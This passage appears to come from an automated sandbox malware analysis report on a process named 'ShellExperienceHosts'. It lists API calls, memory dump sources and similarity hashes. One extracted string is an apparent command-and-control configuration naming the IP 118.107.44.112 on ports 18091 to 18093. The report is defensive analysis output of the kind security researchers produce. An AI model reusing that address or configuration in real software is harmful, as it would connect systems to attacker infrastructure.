                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3Window
                                                                            • String ID:
                                                                            • API String ID: 616115145-0
                                                                            • Opcode ID: 8ba0a3c05b2ddc08ec2d598acbac488b8ed8bffbfbeb351e0f179f1689c13da9
                                                                            • Instruction ID: 73e3a4557df31ccf356973527382492f9b9ed3b9b72fd329119d56f7ad0d7e60
                                                                            • Instruction Fuzzy Hash: 10F08CF0A023159FDBA4DF68C50865E77F5BF0C708B10892EA5A9CBB00DB30D905CB98
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,6C86F45A,?,00000000,?,?,6C86F0FA,?,00000007,?,?,6C86E8A5,?,?), ref: 6C8637ED
                                                                            • GetLastError.KERNEL32(?,?,6C86F45A,?,00000000,?,?,6C86F0FA,?,00000007,?,?,6C86E8A5,?,?), ref: 6C8637F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 485612231-0
                                                                            • Opcode ID: 6ee48e89f256da67bfd571d6f41e1dd1afde1909cf41562ae31a667cc04978cb
                                                                            • Instruction ID: b9f8ef41b3d42bc30b473223a5e33dc7b505d055cb2b9eb82fda88cd7346e463
                                                                            • Instruction Fuzzy Hash: 60E08632200218ABCF212FA59908BC53EB8EB1139DF10C434F50886A60DB34EC50C7E4
APIs
• CreateThread.KERNEL32(00000000,00000000,0332DF10,00000000,00000000,00000000), ref: 0332E49B
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,03331168,?,?,?,?,?,?,03346298,0000000C,03331210,?), ref: 0332E4A9
Memory Dump Source
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
Similarity
• API ID: CreateObjectSingleThreadWait
• String ID:
• API String ID: 1891408510-0
• Opcode ID: 2b4e3c6045ec144207b3037588e2d60f973b0f9f26853a278017896fb5f3852e
• Instruction ID: 7b2a4b5d50a36b71269a84037ce238f938ef49db4739f7506788ff7cda448586
• Opcode Fuzzy Hash: 2b4e3c6045ec144207b3037588e2d60f973b0f9f26853a278017896fb5f3852e
• Instruction Fuzzy Hash: A6E012B5444319BFDF50EB54ACC5E37379CD704770F104715B920D2648DA35E8808660
APIs
• __getptd.LIBCMT ref: 10007181
  • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
  • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
  • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
  • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
  • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
• __XcptFilter.LIBCMT ref: 100071A2
  • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
• String ID:
• API String ID: 418257734-0
• Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
• Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
• Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
• Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
APIs
• __getptd.LIBCMT ref: 0332F98F
  • Part of subcall function 03333E5B: __getptd_noexit.LIBCMT ref: 03333E5E
  • Part of subcall function 03333E5B: __amsg_exit.LIBCMT ref: 03333E6B
  • Part of subcall function 0332F964: __getptd_noexit.LIBCMT ref: 0332F969
  • Part of subcall function 0332F964: __freeptd.LIBCMT ref: 0332F973
  • Part of subcall function 0332F964: ExitThread.KERNEL32 ref: 0332F97C
• __XcptFilter.LIBCMT ref: 0332F9B0
  • Part of subcall function 0333418F: __getptd_noexit.LIBCMT ref: 03334195
Memory Dump Source
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
Similarity
• API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
• String ID:
• API String ID: 418257734-0
• Opcode ID: b2a1ee23d09800383d24b671f641a0d3119fc1d0b3d19f6df34c8488c5a31738
• Instruction ID: 457a6ce900c1589f54b7e94ba268a728845271cbaf693dc628a36366e19a07c5
• Opcode Fuzzy Hash: b2a1ee23d09800383d24b671f641a0d3119fc1d0b3d19f6df34c8488c5a31738
• Instruction Fuzzy Hash: 26E0ECB9D00700EFEB18EBA1D985E7D7775AF46612F208148E1026F2A1CB79A940DA21
APIs
• __lock.LIBCMT ref: 0333641B
  • Part of subcall function 03338E5B: __mtinitlocknum.LIBCMT ref: 03338E71
  • Part of subcall function 03338E5B: __amsg_exit.LIBCMT ref: 03338E7D
  • Part of subcall function 03338E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03333F06,0000000D,03346340,00000008,03333FFF,00000000,?,033310F0,00000000,03346278,00000008,03331155,?), ref: 03338E85
• __tzset_nolock.LIBCMT ref: 0333642C
  • Part of subcall function 03335D22: __lock.LIBCMT ref: 03335D44
  • Part of subcall function 03335D22: ____lc_codepage_func.LIBCMT ref: 03335D8B
  • Part of subcall function 03335D22: __getenv_helper_nolock.LIBCMT ref: 03335DAD
  • Part of subcall function 03335D22: _free.LIBCMT ref: 03335DE4
  • Part of subcall function 03335D22: _strlen.LIBCMT ref: 03335DEB
  • Part of subcall function 03335D22: __malloc_crt.LIBCMT ref: 03335DF2
  • Part of subcall function 03335D22: _strlen.LIBCMT ref: 03335E08
  • Part of subcall function 03335D22: _strcpy_s.LIBCMT ref: 03335E16
  • Part of subcall function 03335D22: __invoke_watson.LIBCMT ref: 03335E2B
  • Part of subcall function 03335D22: _free.LIBCMT ref: 03335E3A
Memory Dump Source
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
Similarity
• API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
• String ID:
• API String ID: 1828324828-0
• Opcode ID: d81286980fdf0aa8ce4b32ad5c31f392b70fb13115ce5f26a40752890e54f261
• Instruction ID: d7e5953460e52954ca59e0f48cab21f819f90a38f129040984221406520d430d
• Opcode Fuzzy Hash: d81286980fdf0aa8ce4b32ad5c31f392b70fb13115ce5f26a40752890e54f261
• Instruction Fuzzy Hash: CCE0C238C43310EBC722FBE0A6C360C7264AB83F31F90C149E4811A090CA3041C1C693
APIs
• DeleteFileW.KERNEL32(6C8606D1,?,6C8606D1,?,?,?,?), ref: 6C86D711
• GetLastError.KERNEL32(?,6C8606D1,?,?,?,?), ref: 6C86D71B
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 794d0fa7719bdaf3d14a1b3de4c1c9df1bd7d3cb5685efb27b8bb1ba48c0d804
• Instruction ID: a75f7953eabc5c47291b568416b553571be90dbf02d02e4b7a308c1b0dbbf98f
• Opcode Fuzzy Hash: 794d0fa7719bdaf3d14a1b3de4c1c9df1bd7d3cb5685efb27b8bb1ba48c0d804
• Instruction Fuzzy Hash: 2AD0C97260524D678A201EBAAD0C8077BBC9B8227D3154A26F42DC5AA0DE29E851D695
APIs
• lstrlenW.KERNEL32(|p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:), ref: 10004755
  • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
Strings
• |p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: __wcsrevlstrlen
• String ID: |p1:118.107.44.112|o1:18091|t1:1|p2:118.107.44.112|o2:18092|t2:1|p3:118.107.44.112|o3:18093|t3:1|dd:1|cl:1|fz:
• API String ID: 4062721203-2301998938
• Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
• Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
• Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
• Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
APIs
• RegCloseKey.ADVAPI32(80000001,03326E9A), ref: 03326EC9
• RegCloseKey.ADVAPI32(75BF73E0), ref: 03326ED2
Memory Dump Source
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: fbc1c38e675962acd2f6bbb473c2e7a764daac659e4d3c42081064831e5a66da
• Instruction ID: e2873d274771e3cf236a62ad860534c329d22f2d6ce8caf5cdd4bb77ed081227
• Opcode Fuzzy Hash: fbc1c38e675962acd2f6bbb473c2e7a764daac659e4d3c42081064831e5a66da
• Instruction Fuzzy Hash: 37C04C72D0102857CB10E7A4ED4494A77B85B4C210F1144C2A104A3114C634BD418F90
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9621fee9d8fd8256f8c5a66095308225b938b35d6a613c55f6df1e8a371667d5
• Instruction ID: 81d14d582be0ff8d92b3c78d746e88f0a48d9a0c6e22ca7ad124d531c6fa8c31
• Opcode Fuzzy Hash: 9621fee9d8fd8256f8c5a66095308225b938b35d6a613c55f6df1e8a371667d5
• Instruction Fuzzy Hash: 9F511630A00208AFCB60CF58CA80E99BBB1EF5A368F248568F8495BB51C372DD51CB91
APIs
• __EH_prolog3.LIBCMT ref: 6C740F83
  • Part of subcall function 6C7412D8: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000001,6C8F39F0,?), ref: 6C741335
  • Part of subcall function 6C7412D8: VerSetConditionMask.KERNEL32(00000000), ref: 6C74133D
  • Part of subcall function 6C7412D8: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C74134E
  • Part of subcall function 6C7412D8: GetSystemMetrics.USER32(00001000), ref: 6C74135F
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
• String ID:
• API String ID: 2710481357-0
• Opcode ID: 2714d577713ee4987a2ae374e09be146da2a5bbaef737462b0ff0f6a8c3fa97b
• Instruction ID: aa27ffc7d0dc9e75c63fc3255c3f0a62e5469b167017c1f7682d0e08e8546477
• Opcode Fuzzy Hash: 2714d577713ee4987a2ae374e09be146da2a5bbaef737462b0ff0f6a8c3fa97b
• Instruction Fuzzy Hash: 1E51DEB0946F45CFD3A9CF3A85457C6FAE0BF89300F50CA2E81AED6660EB7165848F51
APIs
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: fe9e680b3c280d84140272012e4a79c18e73363b21eef082f72885eee2dd8744
• Instruction ID: a9182b8676ea023a323693e6701e030ae9f02d6cf748a2f20b24c0872b83823f
• Opcode Fuzzy Hash: fe9e680b3c280d84140272012e4a79c18e73363b21eef082f72885eee2dd8744
• Instruction Fuzzy Hash: 35115871A0420AABCB15CF59E9409DB3BF9EB48308B004469F805AB301D771EA11CBA5
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0333454A,00000000,00000001,00000000,00000000,00000000,?,03333E0D,00000001,00000214,?,03334500), ref: 0333A735
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 328603210-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 328603210-0
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(00000004), ref: 6C7E173C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Malloc
                                                                            • String ID:
                                                                            • API String ID: 2696272793-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7A1712
                                                                              • Part of subcall function 6C7A134E: TlsAlloc.KERNEL32(?,6C7A173E,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391,?,?,?,6C738C8A,00000000,?), ref: 6C7A136D
                                                                              • Part of subcall function 6C7A134E: InitializeCriticalSection.KERNEL32(6C8F4114,?,6C7A173E,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391,?,?,?,6C738C8A,00000000,?), ref: 6C7A137E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCriticalH_prolog3InitializeSection
                                                                            • String ID:
                                                                            • API String ID: 2369468792-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,6C863AB0,00000001,00000364,?,00000006,000000FF,?,6C860602,?,6C6D82D0,00000000), ref: 6C866B69
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,6C867782,?,?,6C867782,00000220,?,?,?), ref: 6C863843
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000000,?,6C8731E7,?,?,00000000,?,6C8731E7,?,0000000C), ref: 6C873560
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread
                                                                            • String ID:
                                                                            • API String ID: 2882836952-0
                                                                            APIs
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 6C6E1E6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 1531683806-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID:
                                                                            • API String ID: 2809346765-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            APIs
                                                                            • Sleep.KERNEL32 ref: 10005EB2
                                                                              • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep_malloc
                                                                            • String ID:
                                                                            • API String ID: 617756273-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3541795510.000000000049F000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 6C74CD1C
                                                                            • IsWindowVisible.USER32(?), ref: 6C74CD37
                                                                            • GetWindowRect.USER32(?,?), ref: 6C74CD99
                                                                            • IsIconic.USER32(?), ref: 6C74CDA8
                                                                            • CopyRect.USER32(?,?), ref: 6C74CDD6
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 6C74CE0D
                                                                            • GetMonitorInfoW.USER32(00000000), ref: 6C74CE14
                                                                            • CopyRect.USER32(?,?), ref: 6C74CE26
                                                                            • CopyRect.USER32(?,?), ref: 6C74CE34
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C74CE6A
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C74CE99
                                                                            • GetSystemMetrics.USER32(00000022), ref: 6C74CF20
                                                                            • GetSystemMetrics.USER32(00000023), ref: 6C74CF2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
